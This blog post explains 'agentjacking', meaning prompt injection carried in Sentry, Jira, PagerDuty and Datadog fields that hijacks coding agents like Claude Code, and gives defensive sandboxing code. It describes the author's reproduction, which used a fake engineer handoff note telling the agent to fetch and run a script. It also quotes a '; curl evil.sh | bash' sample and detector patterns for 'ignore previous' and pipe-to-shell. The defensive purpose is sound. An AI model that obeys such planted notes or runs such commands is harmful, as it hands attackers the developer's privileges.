Agentjacking via Sentry: How I Sandbox Claude Code

A controlled disclosure from Tenet Security in June showed something I had been quietly worried about for months: a single crafted Sentry error event hijacked Claude Code and got it to execute attacker-supplied instructions with the developer's full local privileges. No breach. No stolen token. No CVE in Sentry itself. The attacker used a public DSN, the same kind that ships in every frontend bundle on the internet.
I have wired Claude Code, Cursor agents, and custom LangGraph workers into Sentry, Jira, PagerDuty, and Datadog pipelines for client engagements. After reading the Tenet writeup and reproducing the core idea in a sandbox, I rebuilt how I let agents touch observability data. Here is what actually changed, why EDR and WAF are useless against this class of attack, and the specific guardrails I now ship by default.
What "agentjacking" actually is, in plain terms
Agentjacking is prompt injection delivered through a trusted business tool. The agent reads an error report, a ticket, a PagerDuty incident, or a log line, treats the contents as instructions instead of data, and acts on them with whatever tools and credentials it currently holds. In the Tenet Sentry case, the payload was a normal-looking error event posted to a public DSN. When the developer asked Claude Code to triage recent Sentry errors, the agent ingested the event, parsed the embedded instructions, and ran the attacker's shell commands locally.
The reason every traditional control missed it:
- EDR saw a developer's own terminal running npm, git, and curl. Nothing anomalous.
- WAF saw normal HTTPS traffic to api.sentry.io. The malicious payload went in through a legitimate, public ingest endpoint.
- IAM saw the developer's own session token being used. The agent inherited it.
- Firewall egress saw outbound calls to GitHub and an S3 bucket. Both are on every allowlist on earth.
The attack surface is not the network. It is the agent's trust boundary between "data I am analyzing" and "instructions I should follow." Sentry, Jira, Datadog, and PagerDuty all have the same exposure because they all accept untrusted user-controlled content (error messages, ticket descriptions, incident summaries, log lines) and present it to agents as authoritative context.
Why Sentry, Datadog, PagerDuty, and Jira are structurally identical here
All four systems share three properties that make them perfect injection carriers:
- Public or semi-public ingest. Sentry DSNs ship in client bundles. PagerDuty integration keys leak in GitHub repos weekly. Datadog accepts logs from anywhere you forward them. Jira often has public-facing intake (Service Desk portals, email-to-ticket).
- High agent trust. Engineers wire these tools into agents precisely because they are the source of truth for what is broken. The agent is expected to act on the contents.
- Rich free-text fields. Error messages, stack traces, ticket bodies, runbook URLs, custom tags. All attacker-controllable. All passed to the model verbatim in most integrations.
Here is the rough mapping of injection vectors I have personally confirmed are reachable:
| Tool | Untrusted field | Who can write it |
|---|---|---|
| Sentry | event message, breadcrumbs, tags, extras | Anyone with the public DSN |
| PagerDuty | incident title, custom details, dedup key | Anyone with the integration key |
| Datadog | log message, tags, span attributes | Anyone forwarding logs |
| Jira | summary, description, comments, attachments | Anyone with portal access or your support email |
If your agent reads from any of these and has tool access to a shell, the file system, the package manager, or your cloud credentials, you have the same exposure Tenet demonstrated.
How I reproduced the core attack in a sandbox
I will not publish a working payload, but the shape is straightforward and useful for engineers who want to test their own setup.
I spun up a throwaway Sentry project, grabbed the public DSN, and posted a single event with a long stack trace. Inside the extra field I placed a block of text that looked like a "debugging note from the on-call engineer" asking the agent to fetch and execute a helper script from a URL I controlled. The helper just wrote a file to /tmp to prove execution.
I then asked Claude Code, in a fresh session with the Sentry MCP server connected, to "look at the latest unresolved error and suggest a fix." The agent retrieved the event, read the fake note, and (depending on the model and the exact wording) either ran the fetch directly or proposed it as the next step in a way that a tired engineer would approve without reading.
Two findings worth sharing:
- The attack does not need to win every time. Even a 5% success rate against an agent that runs on every error is enough.
- The payload does not need to look like a prompt injection. The most effective version I tried was written as a polite handoff note from a fictional senior engineer, including a plausible internal URL.
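To put a rough number on the first finding: if each poisoned event succeeds independently with probability p, the chance that at least one of n attempts lands is 1 - (1 - p)^n. The independence assumption and the function names below are illustrative, not measurements from the reproduction.

```python
import math


def p_at_least_one(p_success: float, attempts: int) -> float:
    """Probability that at least one of `attempts` independent tries succeeds."""
    return 1.0 - (1.0 - p_success) ** attempts


def attempts_for(p_success: float, target: float) -> int:
    """Smallest number of independent tries whose cumulative chance reaches `target`."""
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - p_success))


if __name__ == "__main__":
    for n in (1, 10, 50, 100):
        print(n, round(p_at_least_one(0.05, n), 3))
    print(attempts_for(0.05, 0.95))
```

Under those assumptions, an attacker who can post events to a public DSN for free needs only a few dozen tries before a 5% per-event rate becomes a near-certain hit.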
The sandbox model I now use for agent tool calls
The fix is not "tell the model to ignore instructions in data." That guidance is theater. The fix is to assume every byte coming from Sentry, Jira, PagerDuty, and Datadog is hostile, and to put real engineering between the agent and anything that can hurt you.
Here is the architecture I default to now for any client agent that touches observability tools.
1. Quarantine the read path
Untrusted content never reaches the main agent directly. A small extractor model (cheap, narrow, no tools) reads the raw Sentry/Jira/Datadog payload and outputs a strict JSON schema: error type, file, line, stack frames, fingerprint, severity. Free text is dropped or truncated to a hard limit (I use 2 KB) and tagged as untrusted_string.
    from typing import Literal

    from pydantic import BaseModel, Field

    class TriagedError(BaseModel):
        fingerprint: str
        error_type: str
        file_path: str  # validated against repo paths
        line: int
        severity: Literal["error", "warning", "info"]
        message_excerpt: str = Field(max_length=2000)  # untrusted free text, hard-capped
        # nothing else passes through
The main agent only ever sees this struct. URLs, instructions, code blocks, and HTML in the original event are stripped before it gets anywhere near a tool-calling loop.
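A minimal sketch of the stripping step, assuming a plain regex pass runs before the excerpt is stored in the struct. The function name, the replacement markers, and the exact patterns are hypothetical; a regex pass like this is naive by design and will also eat harmless text such as "a < b and c > d".

```python
import re

MAX_EXCERPT_BYTES = 2000  # mirrors the 2 KB cap described above

# Fenced code: three backticks, anything, three backticks.
_FENCED_CODE = re.compile("`{3}.*?`{3}", re.DOTALL)
_HTML_TAG = re.compile(r"<[^>]+>")
_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def sanitize_excerpt(raw: str, limit: int = MAX_EXCERPT_BYTES) -> str:
    """Drop code fences, HTML tags, and URLs, then truncate to `limit` bytes."""
    text = _FENCED_CODE.sub(" [code removed] ", raw)
    text = _HTML_TAG.sub(" ", text)
    text = _URL.sub("[url removed]", text)
    text = " ".join(text.split())  # collapse all whitespace, including newlines
    # Truncate on bytes, not characters, and discard a split trailing character.
    return text.encode("utf-8")[:limit].decode("utf-8", errors="ignore")
```

The point of doing this in code rather than in the prompt is that the main agent never receives the removed text at all, so there is nothing for it to obey.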
2. Split the agent into two roles with different permissions
I run two agents:
- Triage agent: reads the quarantined struct, has read-only tools (search repo, view file, query metrics). No shell, no network, no write access.
- Action agent: takes a structured proposal from the triage agent and, only after human approval, executes a narrow set of allowlisted commands.
The triage agent cannot escalate. The action agent cannot read raw observability data. This breaks the kill chain even when injection succeeds, because the compromised agent simply does not hold the dangerous tools.
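One way to picture the split is a dispatcher that checks the role's tool set, and the approval flag, outside the model. This is a sketch under assumptions: the Role class, the tool names in each set, and the dispatch function are hypothetical and not tied to any particular agent framework.

```python
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet


@dataclass(frozen=True)
class Role:
    name: str
    allowed_tools: FrozenSet[str]
    needs_approval: bool


# Triage holds read-only tools; action holds a narrow allowlist behind approval.
TRIAGE = Role("triage", frozenset({"search_repo", "view_file", "query_metrics"}), False)
ACTION = Role("action", frozenset({"run_test"}), True)


class ToolDenied(Exception):
    """Raised when a role requests a tool it does not hold, or approval is missing."""


def dispatch(role: Role, tool_name: str, registry: Dict[str, Callable[..., object]],
             approved: bool = False, **kwargs: object) -> object:
    # The check lives outside the model: a hijacked prompt cannot add tools to a role.
    if tool_name not in role.allowed_tools:
        raise ToolDenied(f"{role.name} agent may not call {tool_name}")
    if role.needs_approval and not approved:
        raise ToolDenied(f"{tool_name} requires human approval")
    return registry[tool_name](**kwargs)
```

With this shape, a successful injection into the triage agent can at most produce a bad proposal, because the call to anything dangerous fails at the dispatcher regardless of what the model was talked into.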
3. Run tool execution inside a real sandbox, not a "be careful" prompt
For any agent that needs to run code (Claude Code style), I run it inside a container with:
- Read-only mount of the repo, except a single writable /workspace/scratch directory.
- Egress allowlist enforced at the network namespace, not at the application layer. Default deny. GitHub, npm registry, the specific Sentry/Jira API endpoints. Nothing else.
- No host credentials mounted. AWS, GCP, and registry tokens live outside the container and are exchanged for short-lived, scoped tokens via a broker the agent has to explicitly request through a tool call that requires human approval.
- seccomp profile that blocks ptrace, raw sockets, and module loading.
This is roughly 40 lines of Docker plus a small Python broker. It is the single highest-leverage control I ship.
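As a rough illustration of the container side, here is a sketch that builds a docker run command line with those properties. The function name, image name, and network name are placeholders, and the egress allowlist itself is assumed to be enforced on a pre-created Docker network outside this snippet; the flags only attach the container to it.

```python
from pathlib import Path
from typing import List


def sandbox_argv(repo: Path, scratch: Path, image: str,
                 network: str, seccomp_profile: Path) -> List[str]:
    """Build a `docker run` command line for a locked-down agent container."""
    return [
        "docker", "run", "--rm",
        "--read-only",                          # immutable root filesystem
        "--cap-drop", "ALL",                    # drop every Linux capability
        "--security-opt", "no-new-privileges",
        "--security-opt", f"seccomp={seccomp_profile}",
        "--network", network,                   # assumed: default-deny egress network
        "--mount", f"type=bind,source={repo},target=/workspace,readonly",
        # Depending on the runtime, the repo may need an existing scratch/
        # directory to serve as the mount point for this writable bind.
        "--mount", f"type=bind,source={scratch},target=/workspace/scratch",
        "--tmpfs", "/tmp",
        image,
    ]
```

Note what is absent: no environment variables, no mounted ~/.aws or similar, no --privileged. The list can be handed to subprocess.run(argv, check=True) from whatever launcher starts the agent.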
4. Treat every tool call as a typed contract, not a string
Most agent frameworks let the model emit arbitrary shell strings. Do not do this. Every tool the agent can call should take typed arguments and validate them before execution.
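    import subprocess
    from pathlib import Path

    TESTS_DIR = Path("tests").resolve()

    @tool  # decorator and ToolError come from your agent framework
    def run_test(test_path: str) -> subprocess.CompletedProcess:
        # Resolve first so "tests/../../etc/passwd" cannot slip past a prefix check.
        resolved = Path(test_path).resolve()
        if not resolved.is_relative_to(TESTS_DIR):  # Python 3.9+
            raise ToolError("test_path must be under tests/")
        if not resolved.is_file():
            raise ToolError("test_path does not exist")
        # Argument list, no shell: the model never supplies a command string.
        return subprocess.run(
            ["pytest", str(resolved), "-x", "--timeout=30"],  # --timeout needs pytest-timeout
            capture_output=True, timeout=60, check=False,
        )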
The model cannot ask for ; curl evil.sh | bash because the arguments go to pytest as a list, no shell ever parses them, and there is no string concatenation anywhere in the path. The tool only knows how to run pytest on files under tests/.
5. Add a separate "instruction detector" on the read path
I run a cheap classifier (a small local model via Ollama works fine for this) over every untrusted text field before it reaches even the triage agent. It scores the text for instruction-like patterns: imperative verbs, URLs paired with execution verbs, role-play framing, "ignore previous", and the specific patterns Tenet documented. Anything above a threshold gets quarantined and surfaced to a human, not the agent.
This is not a silver bullet. It catches roughly 80-90% of the obvious payloads in my test corpus and gives me an audit trail. The sandbox catches the rest.
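To make "instruction-like patterns" concrete, here is a regex-only stand-in for the scoring step. It is not the model-based classifier described above, and the patterns, weights, and threshold are illustrative guesses rather than anything taken from the Tenet writeup. Treat it as a cheap pre-filter at best.

```python
import re
from typing import List, Tuple

# (pattern, weight) pairs. Patterns and weights are illustrative guesses.
_SIGNALS: List[Tuple[re.Pattern, float]] = [
    # Classic override phrasing.
    (re.compile(r"\bignore (?:all |any )?(?:previous|prior|above)\b", re.I), 0.6),
    # Role-play framing.
    (re.compile(r"\b(?:you are|act as|pretend to be)\b", re.I), 0.3),
    # Execution verb followed shortly by a URL.
    (re.compile(r"\b(?:run|execute|install|curl|wget)\b[^.\n]{0,80}https?://", re.I), 0.6),
    # URL followed shortly by an execution verb.
    (re.compile(r"https?://[^\s]+[^.\n]{0,80}\b(?:run|execute|install)\b", re.I), 0.4),
    # Piping into a shell.
    (re.compile(r"\|\s*(?:ba)?sh\b", re.I), 0.6),
    # Line that opens with an imperative.
    (re.compile(r"^\s*(?:please\s+)?(?:run|execute|delete|install|send|upload)\b",
                re.I | re.M), 0.3),
]


def instruction_score(text: str) -> float:
    """Sum the weights of matching signals, capped at 1.0."""
    return min(1.0, sum(w for pattern, w in _SIGNALS if pattern.search(text)))


def should_quarantine(text: str, threshold: float = 0.5) -> bool:
    """True when the text should go to a human instead of the agent."""
    return instruction_score(text) >= threshold
```

A pass like this will produce both false positives and misses, which is fine as long as a flagged event goes to a human queue and the sandbox still sits behind it.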
6. Log every tool call with the originating data source
The single most useful debugging and forensic tool I added: every tool invocation logs the upstream source of the context that triggered it. If run_test was called and the triage agent's context included Sentry event abc123, that link is recorded. When something goes wrong, I can answer "which external event caused this action" in one query. Without this, post-incident analysis on agent systems is basically impossible.
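A minimal sketch of what such a log could look like, assuming JSON lines and a "tool:kind:id" naming scheme for sources. Both are assumptions made for illustration; the original setup may store this differently.

```python
import json
import time
import uuid
from typing import Any, Dict, Iterable, List, TextIO


def log_tool_call(out: TextIO, tool: str, args: Dict[str, Any],
                  sources: Iterable[str]) -> Dict[str, Any]:
    """Append one JSON line linking a tool call to the external records in context."""
    record = {
        "call_id": str(uuid.uuid4()),
        "ts": time.time(),
        "tool": tool,
        "args": args,
        # e.g. "sentry:event:abc123"; the naming scheme is an assumption
        "sources": sorted(set(sources)),
    }
    out.write(json.dumps(record) + "\n")
    return record


def calls_triggered_by(lines: Iterable[str], source: str) -> List[Dict[str, Any]]:
    """Answer 'which actions did this external event cause?' from the log."""
    return [r for r in map(json.loads, lines) if source in r["sources"]]
```

Calling calls_triggered_by(open_log_lines, "sentry:event:abc123") is the "one query" version of post-incident analysis: every tool call whose context included that event comes back in a single pass.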
The numbers that convinced me to ship this
On a real client agent that processes around 400 Sentry events a day, the full sandbox stack adds:
- About 180 ms of latency per event (extractor model plus classifier).
- Roughly $0.002 per event in extra inference cost. Call it $25 a month at this volume.
- One additional container per developer workstation for Claude Code style local agents.
In exchange, I have a system where a successful prompt injection in a Sentry event results in, at worst, a triage agent producing a wrong suggestion that a human declines. No code execution. No credential exposure. No outbound traffic to anywhere not on the allowlist.
That trade is not close. $25 a month and 180 ms is nothing against the cost of one compromised developer laptop with cloud credentials on it.
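For anyone who wants to plug in their own volume, the arithmetic behind those figures is short. The 30-day month is an assumption, and the variable names are just for illustration.

```python
EVENTS_PER_DAY = 400
EXTRA_COST_PER_EVENT_USD = 0.002
EXTRA_LATENCY_PER_EVENT_S = 0.180
DAYS_PER_MONTH = 30  # assumption

monthly_events = EVENTS_PER_DAY * DAYS_PER_MONTH  # 12000 events
monthly_cost_usd = round(monthly_events * EXTRA_COST_PER_EVENT_USD, 2)  # 24.0, i.e. roughly $25
daily_added_latency_s = round(EVENTS_PER_DAY * EXTRA_LATENCY_PER_EVENT_S, 1)  # 72.0 seconds in total

if __name__ == "__main__":
    print(monthly_events, monthly_cost_usd, daily_added_latency_s)
```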
What I'd do this week if you have agents wired into observability
If you have Claude Code, Cursor, or a custom agent with Sentry, Jira, PagerDuty, or Datadog access today, here is the order I would attack this in:
- Audit which agents read from public ingest paths. Any DSN in a frontend bundle, any PagerDuty integration key in a public repo, any Service Desk portal. That is your blast radius.
- Strip free-text fields at the integration layer, not in the prompt. Even a naive regex pass that drops URLs and code blocks from Sentry messages before they hit the model removes most opportunistic payloads.
- Split read and write agents. This is a one-day refactor for most setups and it removes the entire class of "injection escalates to execution."
- Containerize the agent's execution environment with egress allowlists and no host credentials. If you cannot do this for local Claude Code today, at least run it in a VM with a separate user account and no SSO session.
- Add source-of-context logging to every tool call. You will need this the first time something weird happens.
- Assume the model is not your security boundary. It never was. The boundary is what tools it can call and what those tools will accept.
The uncomfortable truth is that agent security in 2026 looks a lot like web security in 2005. We are rediscovering that untrusted input plus privileged execution equals a bad day, and we are doing it tool by tool. Sentry happens to be the first one with a public writeup. Datadog, Jira, and PagerDuty have the same shape. So does GitHub Issues. So does your support inbox.
If you are wiring agents into production systems and want a second pair of eyes on the trust boundaries, or you want help building the sandbox layer once instead of three times, get in touch at lazar-milicevic.com/#contact. There is more on agent architecture and production LLM work on the rest of the blog if you want to keep reading.
Frequently asked questions
What is agentjacking and how does it work through tools like Sentry?
Agentjacking is prompt injection delivered through a trusted business tool like Sentry, Jira, PagerDuty, or Datadog. The AI agent reads an error report, ticket, or log line and treats the attacker-controlled contents as instructions rather than data, executing them with whatever local privileges and tools the developer's session holds. In the Sentry case disclosed by Tenet Security, a crafted error event posted to a public DSN caused Claude Code to run attacker-supplied shell commands when an engineer asked it to triage recent errors. No credentials were stolen and no vulnerability existed in Sentry itself, only the agent's failure to distinguish data from instructions.
Why don't EDR, WAF, and firewalls stop agentjacking attacks?
Traditional security controls miss agentjacking because nothing on the network or endpoint looks anomalous. EDR sees the developer's own terminal running normal tools like npm, git, and curl; the WAF sees legitimate HTTPS traffic to api.sentry.io; IAM sees the developer's own valid session token; and egress firewalls see outbound calls to GitHub or S3 that are on every allowlist. The attack surface is not the network at all; it is the agent's trust boundary between data it is analyzing and instructions it should follow. Controls designed for network and process anomalies cannot see a semantic confusion happening inside the model's context window.
Which observability and ticketing tools are vulnerable to prompt injection via agents?
Sentry, PagerDuty, Datadog, and Jira are all structurally vulnerable because they share three properties: public or semi-public ingest endpoints, high agent trust as sources of truth for incidents, and rich free-text fields passed verbatim to models. Sentry event messages and breadcrumbs are writable by anyone with the public DSN, PagerDuty incident titles by anyone with the integration key, Datadog log messages by anyone forwarding logs, and Jira summaries and comments by anyone with portal or support-email access. Any agent that reads from these tools and also has shell, filesystem, package manager, or cloud credential access inherits the same exposure demonstrated against Claude Code via Sentry.
How can I sandbox Claude Code or other AI agents that read from Sentry and Jira?
I treat every byte from observability and ticketing tools as hostile and put real engineering between the agent and anything dangerous. The core pattern is to quarantine the read path: a small, cheap extractor model with no tools parses the raw payload into a strict JSON schema containing only validated fields like fingerprint, error type, file path, and stack frames. Free-text fields are truncated to a hard limit (I use 2 KB) and explicitly tagged as untrusted_string before reaching the main agent. Telling the model to ignore instructions in data is theater; schema-based extraction and tool isolation are what actually work.
Does telling the AI model to ignore instructions in error data prevent prompt injection?
No, instructing the model to ignore injected instructions is security theater and should not be relied on. The most effective payloads I tested did not look like prompt injection at all; the best version was written as a polite handoff note from a fictional senior engineer with a plausible internal URL, which a tired on-call engineer would approve without reading carefully. Even a 5% success rate is catastrophic when an agent runs on every incoming error. The only reliable defense is architectural: extract structured fields with a narrow tool-less model, drop or quarantine free text, and never let untrusted strings reach an agent that holds shell or credential access.